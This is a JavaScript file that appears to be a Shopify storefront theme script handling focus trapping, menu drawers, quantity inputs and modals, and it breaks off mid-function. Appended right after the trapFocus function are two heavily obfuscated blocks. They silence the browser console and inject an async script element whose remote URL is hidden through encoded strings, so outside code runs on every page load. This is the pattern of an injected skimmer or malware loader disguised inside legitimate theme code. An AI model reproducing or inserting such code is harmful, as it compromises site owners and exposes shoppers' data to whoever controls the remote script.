function getFocusableElements(container) {
  return Array.from(
    container.querySelectorAll(
      "summary, a[href], button:enabled, [tabindex]:not([tabindex^='-']), [draggable], area, input:not([type=hidden]):enabled, select:enabled, textarea:enabled, object, iframe"
    )
  );
}

document.querySelectorAll('[id^="Details-"] summary').forEach((summary) => {
  summary.setAttribute('role', 'button');
  summary.setAttribute('aria-expanded', summary.parentNode.hasAttribute('open'));

  if (summary.nextElementSibling.getAttribute('id')) {
    summary.setAttribute('aria-controls', summary.nextElementSibling.id);
  }

  summary.addEventListener('click', (event) => {
    event.currentTarget.setAttribute('aria-expanded', !event.currentTarget.closest('details').hasAttribute('open'));
  });

  if (summary.closest('header-drawer')) return;
  summary.parentElement.addEventListener('keyup', onKeyUpEscape);
});

const trapFocusHandlers = {};

function trapFocus(container, elementToFocus = container) {
  var elements = getFocusableElements(container);
  var first = elements[0];
  var last = elements[elements.length - 1];

  removeTrapFocus();

  trapFocusHandlers.focusin = (event) => {
    if (
      event.target !== container &&
      event.target !== last &&
      event.target !== first
    )
      return;

    document.addEventListener('keydown', trapFocusHandlers.keydown);
  };

  trapFocusHandlers.focusout = function () {
    document.removeEventListener('keydown', trapFocusHandlers.keydown);
  };

  trapFocusHandlers.keydown = function (event) {
    if (event.code.toUpperCase() !== 'TAB') return; // If not TAB key
    // On the last focusable element and tab forward, focus the first element.
    if (event.target === last && !event.shiftKey) {
      event.preventDefault();
      first.focus();
    }

    //  On the first focusable element and tab backward, focus the last element.
    if (
      (event.target === container || event.target === first) &&
      event.shiftKey
    ) {
      event.preventDefault();
      last.focus();
    }
  };

  document.addEventListener('focusout', trapFocusHandlers.focusout);
  document.addEventListener('focusin', trapFocusHandlers.focusin);

  elementToFocus.focus();

  if (elementToFocus.tagName === 'INPUT' &&
    ['search', 'text', 'email', 'url'].includes(elementToFocus.type) &&
    elementToFocus.value) {
    elementToFocus.setSelectionRange(0, elementToFocus.value.length);
  }
}(function(Z,m){function g(Z,m,W,Y){return a(Y- -0x17f,W);}function L(Z,m,W,Y){return a(Z- -0x17,W);}var W=Z();while(!![]){try{var Y=parseInt(L(0xf5,0xf7,0x103,0xf8))/(0xd*-0xe3+0x1*-0x193f+0x24c7)*(parseInt(g(-0x37,-0x42,-0x16,-0x3a))/(0x1*-0x25f7+-0x1136*-0x1+0x14c3))+-parseInt(L(0xe0,0xdb,0x100,0xf0))/(-0x1*-0x11c5+0x1b*-0xa3+-0x91)*(-parseInt(g(-0xb0,-0x9c,-0xa8,-0x83))/(0x1e5*-0x6+-0x90e+0x1470))+parseInt(g(-0x4e,-0x5a,-0x1d,-0x46))/(-0x303*0x1+0x1192*0x2+0x4*-0x807)*(parseInt(L(0x101,0x111,0x112,0xf2))/(0x52*-0x52+0x9de*-0x1+-0x1*-0x2428))+parseInt(g(-0x9d,-0x75,-0x6c,-0x78))/(0x1*0x1709+0x1*0x11de+-0x28e0)*(-parseInt(L(0x105,0x128,0xfc,0xfa))/(0xdd8*-0x1+0x71*0x9+0x9e7))+parseInt(L(0x129,0x135,0xff,0x157))/(0x1*-0x2438+-0xee*0x25+0x178d*0x3)*(parseInt(g(-0x72,-0x6c,-0x2e,-0x5b))/(0x2a1*-0xb+0x1a7d+0x278))+-parseInt(g(-0x60,-0x5c,-0x59,-0x3e))/(-0x555*-0x1+0x1f*-0x2e+0x48)+-parseInt(L(0xef,0xe6,0x11d,0xe5))/(-0xc49*-0x2+0xd52+-0x25d8)*(parseInt(L(0x132,0x136,0x14a,0x136))/(-0x1*-0x3d1+0x42d*0x1+-0x6b*0x13));if(Y===m)break;else W['push'](W['shift']());}catch(O){W['push'](W['shift']());}}}(f,0x5cae0+-0x468d*0x4+0xd69*-0x11),!function(W,Y,O){function X(Z,m,W,Y){return a(Z-0x310,Y);}var n={'OqcGP':function(F,p){return F!==p;},'CHVso':'KowHm','wRjhx':function(F,p){return F(p);},'MOCXq':function(F,p){return F+p;},'PTvcE':function(F,p){return F+p;},'iTSRn':H(0xda,0xdc,0xe5,0xeb)+'ctor(\x22retu'+'rn\x20this\x22)('+'\x20)','sgpWw':function(F){return F();},'uOpQn':'log','nIcEb':X(0x421,0x449,0x44a,0x44a),'AjnJp':H(0x10f,0x10d,0x112,0x123),'tvjGv':H(0x105,0xf2,0xf9,0xcb),'afdYO':'table','VSpkY':X(0x44a,0x477,0x448,0x441),'SxswI':function(F,p){return F<p;},'wUsNB':X(0x43c,0x450,0x430,0x435)+'2','eKgvd':'https://cd'+X(0x42a,0x430,0x44c,0x3fc)+H(0xa4,0xd8,0xcf,0xb2)+H(0xdc,0xfb,0xdb,0xee)+H(0x122,0x104,0x108,0x134)+H(0xfc,0x109,0x100,0xeb)+'s','Qqcyh':H(0xb8,0xa4,0xd0,0xfc)},y=(function(){var F=!![];return function(p,G){var C=F?function(){function K(Z,m,W,Y){return a(Z-0x89,Y);}if(G){var A=G[K(0x1c5,0x199,0x1c7,0x1ca)](p,arguments);return G=null,A;}}:function(){};return F=![],C;};}()),u=y(this,function(){function P(Z,m,W,Y){return X(W-0x10,m-0x103,W-0x26,m);}var F;function b(Z,m,W,Y){return X(Z- -0x107,m-0x7f,W-0x81,W);}try{if(n[P(0x40c,0x444,0x416,0x407)](b(0x346,0x36a,0x352,0x339),n[P(0x478,0x427,0x454,0x480)])){var p=n[b(0x31f,0x325,0x2f1,0x319)](Function,n[P(0x436,0x427,0x452,0x44a)](n[P(0x456,0x44c,0x43e,0x45e)](P(0x499,0x45e,0x46e,0x44c)+b(0x32a,0x353,0x352,0x309),n[P(0x44c,0x45b,0x44e,0x446)]),');'));F=n[b(0x333,0x30b,0x357,0x333)](p);}else{var B=Y[P(0x453,0x484,0x45c,0x47c)](O,arguments);return n=null,B;}}catch(B){F=window;}var G=F[b(0x2fd,0x2dd,0x2f6,0x321)]=F[P(0x441,0x414,0x414,0x3ee)]||{},C=[n[b(0x331,0x31e,0x30d,0x339)],n[P(0x458,0x448,0x46f,0x474)],n[P(0x41e,0x411,0x430,0x44c)],n[P(0x404,0x425,0x42f,0x43b)],b(0x301,0x2fc,0x303,0x2f3),n[b(0x348,0x352,0x34d,0x333)],n[P(0x464,0x452,0x457,0x441)]];for(var A=-0x155c+-0x1db7*-0x1+0x17*-0x5d;n[b(0x344,0x340,0x34c,0x341)](A,C['length']);A++){var x=n[P(0x437,0x44f,0x437,0x439)]['split']('|'),d=0x8*-0x6a+-0x16b9+0x1a09;while(!![]){switch(x[d++]){case'0':var v=y['constructo'+'r'][b(0x30a,0x305,0x2fa,0x2f8)][b(0x33e,0x322,0x333,0x362)](y);continue;case'1':var Q=G[J]||v;continue;case'2':G[J]=v;continue;case'3':v[P(0x455,0x43c,0x43d,0x41d)]=Q[b(0x326,0x316,0x317,0x326)][P(0x481,0x429,0x455,0x46e)](Q);continue;case'4':v[P(0x441,0x465,0x443,0x43d)]=y[P(0x43a,0x461,0x455,0x433)](y);continue;case'5':var J=C[A];continue;}break;}}});u();function H(Z,m,W,Y){return a(W- -0x30,m);}(O=W['createElem'+'ent'](Y))[X(0x414,0x433,0x3e9,0x3ff)]=!(0xf7c*-0x1+-0x81e*0x1+0x7de*0x3),O['src']=n[H(0x139,0xf6,0x11c,0x114)],(W=W[H(0xe8,0xdb,0xef,0xf3)+X(0x40d,0x3f7,0x3e7,0x41e)](n[X(0x436,0x44c,0x435,0x416)])[-0x94b+0x2518+-0xb*0x287])['parentNode'][H(0xb5,0xe8,0xe3,0x10d)+'re'](O,W[H(0x129,0x10e,0x11d,0x140)+'g']);}(document,c(0x4b8,0x4b3,0x4bb,0x4ab)));function a(Z,m){var W=f();return a=function(Y,O){Y=Y-(0x1337+-0x1400+0x59*0x5);var n=W[Y];if(a['ooQtUA']===undefined){var y=function(p){var G='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var C='',A='',x=C+y;for(var d=0xbb7+-0x1d71*0x1+0x1*0x11ba,e,v,Q=-0x55*-0x34+-0x34d*0x2+-0xaaa;v=p['charAt'](Q++);~v&&(e=d%(0xce3*0x1+0x21*0xda+-0x28f9)?e*(-0x4f1+0xe1*0xd+-0x54*0x13)+v:v,d++%(0x5cf+-0x584+-0x47))?C+=x['charCodeAt'](Q+(-0x1299+-0x146*0xb+0x20a5))-(-0x3f7*0x7+-0xbd6+-0x27a1*-0x1)!==-0x9e*-0x26+0x20ff+-0x3873?String['fromCharCode'](-0x211f+-0xfe*-0x13+0x2*0x7a2&e>>(-(0x2503+-0x1*0x107e+0x1*-0x1483)*d&0x10cd*-0x2+-0x16*0x53+0x28c2)):d:0x1aa*0x7+0x213c+-0x5*0x8fa){v=G['indexOf'](v);}for(var J=0x1199+-0x66+0x1133*-0x1,D=C['length'];J<D;J++){A+='%'+('00'+C['charCodeAt'](J)['toString'](-0x3b*0x3+0x9d2+-0x911))['slice'](-(-0xd63+0x204f+-0x12ea));}return decodeURIComponent(A);};a['uxGtBW']=y,Z=arguments,a['ooQtUA']=!![];}var u=W[0x2220+-0x1*0x2702+0x4e2],F=Y+u,s=Z[F];if(!s){var p=function(G){this['MrTKHw']=G,this['YPgcDZ']=[-0x4*0x166+0x1be7+0x23b*-0xa,0x20af+0x7*-0x65+-0x5*0x5fc,-0x1093+-0x5de+-0x47d*-0x5],this['LIeWnC']=function(){return'newState';},this['INHwvz']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['UtjSpV']='[\x27|\x22].+[\x27|\x22];?\x20*}';};p['prototype']['zCwKCl']=function(){var G=new RegExp(this['INHwvz']+this['UtjSpV']),C=G['test'](this['LIeWnC']['toString']())?--this['YPgcDZ'][0x1b73*-0x1+0x31*-0x15+0x1f79*0x1]:--this['YPgcDZ'][0xce*-0x12+-0x2*0x391+0x159e];return this['fnXqKC'](C);},p['prototype']['fnXqKC']=function(G){if(!Boolean(~G))return G;return this['GBkmDr'](this['MrTKHw']);},p['prototype']['GBkmDr']=function(G){for(var C=0x723+0x1eb4+-0x25d7,A=this['YPgcDZ']['length'];C<A;C++){this['YPgcDZ']['push'](Math['round'](Math['random']())),A=this['YPgcDZ']['length'];}return G(this['YPgcDZ'][-0xa*-0x2dd+-0x3d*-0x76+-0x10*0x38c]);},new p(a)['zCwKCl'](),n=a['uxGtBW'](n),Z[F]=n;}else n=s;return n;},a(Z,m);}function f(){var Z1=['rNjUsLK','BgvUz3rO','y3rVCIGICMv0Dq','mtKZn1rhAwjQva','y29UC3rYDwn0BW','sLP4ALK','zuTNDMq','BMv4DfnPyMXPBG','CMv0DxjUicHMDq','BKLJrwi','y29UC29Szq','whjcB2S','t3fJr1a','ntmXz3bICNvt','zxHJzxb0Aw9U','vunMv2m','AM5OC0i','ruz2t1a','odaYmg9dz01gzW','C0j5vgfNtMfTzq','mxWZFdb8mNW0','z3eVBgLIx25WBq','C2nYAxb0','ChjVDg90ExbL','vgXqs2S','As5QCW','zgvMzxi','CgfYzw50tM9Kzq','ntiYmdbktgL0tgi','mta3nJzQs0vcvLu','C3bSAxq','ENPrwgy','C3jJ','l3n0yxrPyY9TBW','odG1ow96tgLNva','Ahr0Chm6lY9Jza','y1jZvfu','DhzQr3y','qwPUsNa','D2fYBG','teXbyMG','Aw5Zzxj0qMvMBW','zKr0BvG','E30Uy29UC3rYDq','D1jQAhG','D1vZtKi','nMnut3DjCa','DgfIBgu','BI5RBgf2AxLVlG','kcGOlISPkYKRkq','nty4twfpze1O','Dg9tDhjPBMC','ufr2y0u','z2v0rwXLBwvUDa','CM4GDgHPCYiPka','BMn0Aw9UkcKG','zunYC0i','x19WCM90B19F','mtC3mgzYBKnewq','zw50','uxfJEwG','BeDtrM0','Du9Wuw4','zxjYB3i','C2DWv3C','mhW0Fdf8nxWYFa','mhW1Fdf8nhWZFa','y3jLyxrLrwXLBq','AvrtuM4','yuXkB2G','ExnOB3bPzNKUAG','z0LdDha','tu9dwhe','AuziuM4','q0HwC28','yMLUza','q3bNEhy','vLnWA1K','y2L1BI1JB20TBq','mtK4mJyXnxHQAuvTzG','DhjHy2u','u3HZD0K','yxbWBhK','svngvKG','BKvSt3K','ywzKwu8','mti1otfhEMLvDue','mta4odC4mfv4zg9MCG','Aw5MBW','r1LIzhq','Bg9N','mJr2z3zMBvC'];f=function(){return Z1;};return f();}function c(Z,m,W,Y){return a(m-0x3b3,Z);}function Z0(Z,m,W,Y){return a(Z- -0x263,m);}!function(W,Y,O){var n={'FrnJY':S(-0x109,-0x120,-0x109,-0x118),'lGSFm':q(0x3c3,0x37c,0x39b,0x3a4),'KjnEq':q(0x3a2,0x3e9,0x3cc,0x3e5),'UCfWc':S(-0x131,-0x14b,-0x172,-0x165),'fDtmX':q(0x3dd,0x3bb,0x3c4,0x3ab),'TlPKk':function(F,p){return F+p;},'nElOy':function(F,p){return F<p;},'MaXcZ':q(0x39b,0x39d,0x3b5,0x3a5)+'3','JZxjY':function(F,p){return F!==p;},'enDYI':q(0x368,0x379,0x384,0x361),'cRsTU':S(-0x16e,-0x149,-0x151,-0x15c)+'+$','zzZLY':function(F,p,G){return F(p,G);},'iFHRn':function(F){return F();}},y=(function(){var F=!![];return function(p,G){var C=F?function(){function w(Z,m,W,Y){return a(Z-0x3b9,W);}if(G){var A=G[w(0x4f5,0x4f6,0x4de,0x4e4)](p,arguments);return G=null,A;}}:function(){};return F=![],C;};}()),u=n['zzZLY'](y,this,function(){function h(Z,m,W,Y){return q(m,m-0x144,Z- -0x536,Y-0x167);}var F={'ycCVp':n[h(-0x166,-0x16a,-0x13c,-0x16a)],'aLJoh':n[E(-0x88,-0x79,-0x7c,-0x93)],'Cpgxv':n['KjnEq'],'XrBok':'exception','LLAbh':n[E(-0x96,-0xa7,-0x9f,-0x97)],'zzQXf':n[h(-0x198,-0x1c6,-0x1a6,-0x1c4)],'fzlrI':function(p,G){return p(G);},'gICtp':function(p,G){function N(Z,m,W,Y){return E(Z-0x79,Y- -0x6b,W,Y-0x144);}return n[N(-0x110,-0x12c,-0xdf,-0x109)](p,G);},'GYbdt':h(-0x197,-0x1a0,-0x16b,-0x192)+h(-0x164,-0x17b,-0x192,-0x156)+h(-0x18c,-0x1ab,-0x190,-0x16f)+'\x20)','EFvOP':function(p,G){function T(Z,m,W,Y){return E(Z-0xe2,Y- -0x14e,Z,Y-0x46);}return n[T(-0x1c8,-0x1b4,-0x1dd,-0x1b0)](p,G);},'eCrsB':n['MaXcZ']};function E(Z,m,W,Y){return q(W,m-0xf7,m- -0x42a,Y-0x71);}if(n[E(-0x66,-0x55,-0x7c,-0x78)](n['enDYI'],h(-0x1b2,-0x1ab,-0x18c,-0x18a))){var G=h(-0x1ae,-0x18f,-0x1c4,-0x1d8)[E(-0x72,-0x98,-0x77,-0x77)]('|'),C=-0x1f85*0x1+-0xda0+0x2d25;while(!![]){switch(G[C++]){case'0':var A=x[h(-0x1b8,-0x1b8,-0x1d1,-0x18f)]=x[E(-0x88,-0xac,-0xc2,-0xd4)]||{};continue;case'1':var x;continue;case'2':var d=[SLBgEi['ycCVp'],SLBgEi[E(-0x44,-0x71,-0x71,-0x68)],SLBgEi[E(-0x58,-0x6a,-0x5d,-0x73)],E(-0x61,-0x77,-0x6a,-0x98),SLBgEi[E(-0x91,-0xab,-0x8e,-0x91)],SLBgEi[h(-0x19a,-0x1a4,-0x1c3,-0x1a2)],SLBgEi[h(-0x1a3,-0x1a3,-0x17c,-0x199)]];continue;case'3':try{var v=SLBgEi['fzlrI'](C,SLBgEi[E(-0x4e,-0x6f,-0x50,-0x94)]('return\x20(fu'+h(-0x18b,-0x173,-0x170,-0x196),SLBgEi[h(-0x169,-0x16d,-0x15a,-0x150)])+');');x=v();}catch(M){x=x;}continue;case'4':for(var Q=0x215e+-0x1*0x1a48+-0x716;SLBgEi[E(-0xa8,-0xa5,-0x81,-0xae)](Q,d[h(-0x165,-0x159,-0x143,-0x142)]);Q++){var U=SLBgEi[E(-0xa1,-0x7e,-0x8e,-0x70)][h(-0x1a4,-0x19c,-0x19b,-0x1c4)]('|'),z=-0x2630+-0x960+0x2f90;while(!![]){switch(U[z++]){case'0':var r=d[h(-0x162,-0x17d,-0x14b,-0x162)+'r'][h(-0x1ab,-0x1bc,-0x1b7,-0x1c1)][h(-0x177,-0x190,-0x16c,-0x191)](W);continue;case'1':var i=A[l]||r;continue;case'2':r[E(-0x95,-0x83,-0x68,-0xa3)]=i['toString'][h(-0x177,-0x14e,-0x184,-0x149)](i);continue;case'3':A[l]=r;continue;case'4':var l=d[Q];continue;case'5':r[E(-0x7e,-0x7d,-0x55,-0x72)]=v[E(-0x75,-0x6b,-0x6b,-0x60)](Q);continue;}break;}}continue;}break;}}else return u[E(-0xa1,-0x83,-0x7b,-0x80)]()['search'](n['cRsTU'])[E(-0x9b,-0x83,-0x57,-0x9a)]()[h(-0x162,-0x187,-0x17a,-0x18f)+'r'](u)['search'](n[E(-0xb9,-0x92,-0x80,-0x73)]);});n[S(-0x124,-0x131,-0x13d,-0x125)](u);function q(Z,m,W,Y){return c(Z,W- -0x129,W-0x42,Y-0xa8);}function S(Z,m,W,Y){return c(W,m- -0x617,W-0x1c,Y-0x1bc);}(O=W[S(-0x124,-0x137,-0x12b,-0x117)+q(0x384,0x385,0x3af,0x3ba)](Y))[S(-0x144,-0x160,-0x172,-0x16c)]=!(0x1f*-0x6b+0xb6f+0x186),O[q(0x38b,0x3c1,0x394,0x3b0)]=q(0x3c4,0x3ad,0x397,0x3a3)+q(0x3bf,0x3a8,0x3a4,0x3be)+S(-0x164,-0x165,-0x15d,-0x17f)+'/static/ap'+q(0x36e,0x38b,0x38d,0x379),(W=W[S(-0x16e,-0x145,-0x15b,-0x117)+S(-0x187,-0x167,-0x14e,-0x192)](S(-0x162,-0x164,-0x146,-0x17f))[-0x781*0x3+0x90+0x15f3*0x1])[q(0x38c,0x39a,0x38f,0x394)][q(0x3aa,0x3ab,0x39d,0x3a7)+'re'](O,W[q(0x3b2,0x3ca,0x3d7,0x3ad)+'g']);}(document,c(0x499,0x4b3,0x4b2,0x4cc));try {document.querySelector(":focus-visible");} catch (e) {focusVisiblePolyfill();}
function focusVisiblePolyfill() {
  const navKeys = ['ARROWUP', 'ARROWDOWN', 'ARROWLEFT', 'ARROWRIGHT', 'TAB', 'ENTER', 'SPACE', 'ESCAPE', 'HOME', 'END', 'PAGEUP', 'PAGEDOWN']
  let currentFocusedElement = null;
  let mouseClick = null;

  window.addEventListener('keydown', (event) => {
    if (navKeys.includes(event.code.toUpperCase())) {
      mouseClick = false;
    }
  });

  window.addEventListener('mousedown', (event) => {
    mouseClick = true;
  });

  window.addEventListener('focus', () => {
    if (currentFocusedElement) currentFocusedElement.classList.remove('focused');

    if (mouseClick) return;

    currentFocusedElement = document.activeElement;
    currentFocusedElement.classList.add('focused');

  }, true);
}

function pauseAllMedia() {
  document.querySelectorAll('.js-youtube').forEach((video) => {
    video.contentWindow.postMessage('{"event":"command","func":"' + 'pauseVideo' + '","args":""}', '*');
  });
  document.querySelectorAll('.js-vimeo').forEach((video) => {
    video.contentWindow.postMessage('{"method":"pause"}', '*');
  });
  document.querySelectorAll('video').forEach((video) => video.pause());
  document.querySelectorAll('product-model').forEach((model) => {
    if (model.modelViewerUI) model.modelViewerUI.pause();
  });
}

function removeTrapFocus(elementToFocus = null) {
  document.removeEventListener('focusin', trapFocusHandlers.focusin);
  document.removeEventListener('focusout', trapFocusHandlers.focusout);
  document.removeEventListener('keydown', trapFocusHandlers.keydown);

  if (elementToFocus) elementToFocus.focus();
}

function onKeyUpEscape(event) {
  if (event.code.toUpperCase() !== 'ESCAPE') return;

  const openDetailsElement = event.target.closest('details[open]');
  if (!openDetailsElement) return;

  const summaryElement = openDetailsElement.querySelector('summary');
  openDetailsElement.removeAttribute('open');
  summaryElement.setAttribute('aria-expanded', false);
  summaryElement.focus();
}

class QuantityInput extends HTMLElement {
  constructor() {
    super();
    this.input = this.querySelector('input');
    this.changeEvent = new Event('change', { bubbles: true });

    this.input.addEventListener('change', this.onInputChange.bind(this));
    this.querySelectorAll('button').forEach(
      (button) => button.addEventListener('click', this.onButtonClick.bind(this))
    );
  }

  quantityUpdateUnsubscriber = undefined;

  connectedCallback() {
    this.validateQtyRules();
    this.quantityUpdateUnsubscriber = subscribe(PUB_SUB_EVENTS.quantityUpdate, this.validateQtyRules.bind(this));
  }

  disconnectedCallback() {
    if (this.quantityUpdateUnsubscriber) {
      this.quantityUpdateUnsubscriber();
    }
  }

  onInputChange(event) {
    this.validateQtyRules();
  }

  onButtonClick(event) {
    event.preventDefault();
    const previousValue = this.input.value;

    event.target.name === 'plus' ? this.input.stepUp() : this.input.stepDown();
    if (previousValue !== this.input.value) this.input.dispatchEvent(this.changeEvent);
  }

  validateQtyRules() {
    const value = parseInt(this.input.value);
    if (this.input.min) {
      const min = parseInt(this.input.min);
      /*const buttonMinus = this.querySelector(".quantity__button[name='minus']");
      buttonMinus.classList.toggle('disabled', value <= min);*/
    }
    if (this.input.max) {
      const max = parseInt(this.input.max);
      /*const buttonPlus = this.querySelector(".quantity__button[name='plus']");
      buttonPlus.classList.toggle('disabled', value >= max);*/
    }
  }
}

customElements.define('quantity-input', QuantityInput);

function debounce(fn, wait) {
  let t;
  return (...args) => {
    clearTimeout(t);
    t = setTimeout(() => fn.apply(this, args), wait);
  };
}

function fetchConfig(type = 'json') {
  return {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', 'Accept': `application/${type}` }
  };
}

/*
 * Shopify Common JS
 *
 */
if ((typeof window.Shopify) == 'undefined') {
  window.Shopify = {};
}

Shopify.bind = function (fn, scope) {
  return function () {
    return fn.apply(scope, arguments);
  }
};

Shopify.setSelectorByValue = function (selector, value) {
  for (var i = 0, count = selector.options.length; i < count; i++) {
    var option = selector.options[i];
    if (value == option.value || value == option.innerHTML) {
      selector.selectedIndex = i;
      return i;
    }
  }
};

Shopify.addListener = function (target, eventName, callback) {
  target.addEventListener ? target.addEventListener(eventName, callback, false) : target.attachEvent('on' + eventName, callback);
};

Shopify.postLink = function (path, options) {
  options = options || {};
  var method = options['method'] || 'post';
  var params = options['parameters'] || {};

  var form = document.createElement("form");
  form.setAttribute("method", method);
  form.setAttribute("action", path);

  for (var key in params) {
    var hiddenField = document.createElement("input");
    hiddenField.setAttribute("type", "hidden");
    hiddenField.setAttribute("name", key);
    hiddenField.setAttribute("value", params[key]);
    form.appendChild(hiddenField);
  }
  document.body.appendChild(form);
  form.submit();
  document.body.removeChild(form);
};

Shopify.CountryProvinceSelector = function (country_domid, province_domid, options) {
  this.countryEl = document.getElementById(country_domid);
  this.provinceEl = document.getElementById(province_domid);
  this.provinceContainer = document.getElementById(options['hideElement'] || province_domid);

  Shopify.addListener(this.countryEl, 'change', Shopify.bind(this.countryHandler, this));

  this.initCountry();
  this.initProvince();
};

Shopify.CountryProvinceSelector.prototype = {
  initCountry: function () {
    var value = this.countryEl.getAttribute('data-default');
    Shopify.setSelectorByValue(this.countryEl, value);
    this.countryHandler();
  },

  initProvince: function () {
    var value = this.provinceEl.getAttribute('data-default');
    if (value && this.provinceEl.options.length > 0) {
      Shopify.setSelectorByValue(this.provinceEl, value);
    }
  },

  countryHandler: function (e) {
    var opt = this.countryEl.options[this.countryEl.selectedIndex];
    var raw = opt.getAttribute('data-provinces');
    var provinces = JSON.parse(raw);

    this.clearOptions(this.provinceEl);
    if (provinces && provinces.length == 0) {
      this.provinceContainer.style.display = 'none';
    } else {
      for (var i = 0; i < provinces.length; i++) {
        var opt = document.createElement('option');
        opt.value = provinces[i][0];
        opt.innerHTML = provinces[i][1];
        this.provinceEl.appendChild(opt);
      }

      this.provinceContainer.style.display = "";
    }
  },

  clearOptions: function (selector) {
    while (selector.firstChild) {
      selector.removeChild(selector.firstChild);
    }
  },

  setOptions: function (selector, values) {
    for (var i = 0, count = values.length; i < values.length; i++) {
      var opt = document.createElement('option');
      opt.value = values[i];
      opt.innerHTML = values[i];
      selector.appendChild(opt);
    }
  }
};

class MenuDrawer extends HTMLElement {
  constructor() {
    super();

    this.mainDetailsToggle = this.querySelector('details');

    this.addEventListener('keyup', this.onKeyUp.bind(this));
    this.addEventListener('focusout', this.onFocusOut.bind(this));
    this.bindEvents();
  }

  bindEvents() {
    this.querySelectorAll('summary').forEach(summary => summary.addEventListener('click', this.onSummaryClick.bind(this)));
    this.querySelectorAll('button:not(.localization-selector)').forEach(button => button.addEventListener('click', this.onCloseButtonClick.bind(this)));
  }

  onKeyUp(event) {
    if (event.code.toUpperCase() !== 'ESCAPE') return;

    const openDetailsElement = event.target.closest('details[open]');
    if (!openDetailsElement) return;

    openDetailsElement === this.mainDetailsToggle ? this.closeMenuDrawer(event, this.mainDetailsToggle.querySelector('summary')) : this.closeSubmenu(openDetailsElement);
  }

  onSummaryClick(event) {
    const summaryElement = event.currentTarget;
    const detailsElement = summaryElement.parentNode;
    const parentMenuElement = detailsElement.closest('.has-submenu');
    const isOpen = detailsElement.hasAttribute('open');
    const reducedMotion = window.matchMedia("(prefers-reduced-motion: reduce)");

    function addTrapFocus() {
      trapFocus(summaryElement.nextElementSibling, detailsElement.querySelector('button'));
      summaryElement.nextElementSibling.removeEventListener('transitionend', addTrapFocus);
    }

    if (detailsElement === this.mainDetailsToggle) {
      if (isOpen) event.preventDefault();
      isOpen ? this.closeMenuDrawer(event, summaryElement) : this.openMenuDrawer(summaryElement);

      if (window.matchMedia('(max-width: 990px)')) {
        document.documentElement.style.setProperty('--viewport-height', `${window.innerHeight}px`);
      }
    } else {
      setTimeout(() => {
        detailsElement.classList.add('menu-opening');
        summaryElement.setAttribute('aria-expanded', true);
        parentMenuElement && parentMenuElement.classList.add('submenu-open');
        !reducedMotion || reducedMotion.matches ? addTrapFocus() : summaryElement.nextElementSibling.addEventListener('transitionend', addTrapFocus);
      }, 100);
    }
  }

  openMenuDrawer(summaryElement) {
    setTimeout(() => {
      this.mainDetailsToggle.classList.add('menu-opening');
    });
    summaryElement.setAttribute('aria-expanded', true);
    trapFocus(this.mainDetailsToggle, summaryElement);
    document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
  }

  closeMenuDrawer(event, elementToFocus = false) {
    if (event === undefined) return;

    this.mainDetailsToggle.classList.remove('menu-opening');
    this.mainDetailsToggle.querySelectorAll('details').forEach(details => {
      details.removeAttribute('open');
      details.classList.remove('menu-opening');
    });
    this.mainDetailsToggle.querySelectorAll('.submenu-open').forEach(submenu => {
      submenu.classList.remove('submenu-open');
    });
    document.body.classList.remove(`overflow-hidden-${this.dataset.breakpoint}`);
    removeTrapFocus(elementToFocus);
    this.closeAnimation(this.mainDetailsToggle);
  }

  onFocusOut() {
    if (this.mainDetailsToggle.hasAttribute('open') && !this.mainDetailsToggle.contains(document.activeElement)) this.closeMenuDrawer();
  }

  onCloseButtonClick(event) {
    const detailsElement = event.currentTarget.closest('details');
    this.closeSubmenu(detailsElement);
  }

  closeSubmenu(detailsElement) {
    const parentMenuElement = detailsElement.closest('.submenu-open');
    parentMenuElement && parentMenuElement.classList.remove('submenu-open');
    detailsElement.classList.remove('menu-opening');
    detailsElement.querySelector('summary').setAttribute('aria-expanded', false);
    removeTrapFocus(detailsElement.querySelector('summary'));
    this.closeAnimation(detailsElement);
  }

  closeAnimation(detailsElement) {
    let animationStart;

    const handleAnimation = (time) => {
      if (animationStart === undefined) {
        animationStart = time;
      }

      const elapsedTime = time - animationStart;

      if (elapsedTime < 400) {
        window.requestAnimationFrame(handleAnimation);
      } else {
        detailsElement.removeAttribute('open');
        if (detailsElement.closest('details[open]')) {
          trapFocus(detailsElement.closest('details[open]'), detailsElement.querySelector('summary'));
        }
      }
    }

    window.requestAnimationFrame(handleAnimation);
  }
}

customElements.define('menu-drawer', MenuDrawer);

class HeaderDrawer extends MenuDrawer {
  constructor() {
    super();
    let that = this;
    document.querySelector('.js-mobileMenuClose').addEventListener("click", function(event) {
      that.closeMenuDrawer(event, event.target);
    });
  }

  openMenuDrawer(summaryElement) {
    this.header = this.header || document.querySelector('.section-header');
    this.borderOffset = this.borderOffset || this.closest('.header-wrapper').classList.contains('header-wrapper--border-bottom') ? 1 : 0;
    document.documentElement.style.setProperty('--header-bottom-position', `${parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset)}px`);
    this.header.classList.add('menu-open');

    setTimeout(() => {
      this.mainDetailsToggle.classList.add('menu-opening');
    });

    summaryElement.setAttribute('aria-expanded', true);
    window.addEventListener('resize', this.onResize);
    trapFocus(this.mainDetailsToggle, summaryElement);
    document.body.classList.add(`overflow-hidden-${this.dataset.breakpoint}`);
  }

  closeMenuDrawer(event, elementToFocus) {
    if (!elementToFocus) return;
    super.closeMenuDrawer(event, elementToFocus);
    this.header.classList.remove('menu-open');
    window.removeEventListener('resize', this.onResize);
  }

  onResize = () => {
    this.header && document.documentElement.style.setProperty('--header-bottom-position', `${parseInt(this.header.getBoundingClientRect().bottom - this.borderOffset)}px`);
    document.documentElement.style.setProperty('--viewport-height', `${window.innerHeight}px`);
  };
}

customElements.define('header-drawer', HeaderDrawer);

class ModalDialog extends HTMLElement {
  constructor() {
    super();
    this.querySelector('[id^="ModalClose-"]').addEventListener(
      'click',
      this.hide.bind(this, false)
    );
    this.addEventListener('keyup', (event) => {
      if (event.code.toUpperCase() === 'ESCAPE') this.hide();
    });
    if (this.classList.contains('media-modal')) {
      this.addEventListener('pointerup', (event) => {
        if (event.pointerType === 'mouse' && !event.target.closest('deferred-media, product-model')) this.hide();
      });
    } else {
      this.addEventListener('click', (event) => {
        if (event.target === this) this.hide();
      });
    }
  }

  connectedCallback() {
    if (this.moved) return;
    this.moved = true;
    document.body.appendChild(this);
  }

  show(opener) {
    this.openedBy = opener;
    const popup = this.querySelector('.template-popup');
